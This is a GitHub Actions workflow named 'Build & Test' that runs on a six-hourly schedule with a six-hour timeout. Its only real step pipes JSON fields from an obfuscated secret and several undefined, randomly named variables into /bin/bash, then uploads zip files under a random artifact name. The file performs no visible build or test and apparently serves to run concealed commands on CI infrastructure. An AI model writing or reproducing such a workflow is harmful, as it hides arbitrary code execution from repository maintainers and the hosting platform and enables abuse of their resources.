name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '55 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          bxfe3304: ${{ secrets.bxfe3304 }}
        run: |
          printf '%s' "$bxfe3304" | jq -r .ejjj10557 | /bin/bash
          printf '%s' "$roga73603" | jq -r .y7 | /bin/bash
          echo $c15021 | jq -r .ms4690 | /bin/bash
          echo $jxycn5950 | jq -r .b43 | /bin/bash
          echo $ya05 | jq -r .f70 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: VSN6pRLu
          path: "*.zip"
          retention-days: 1
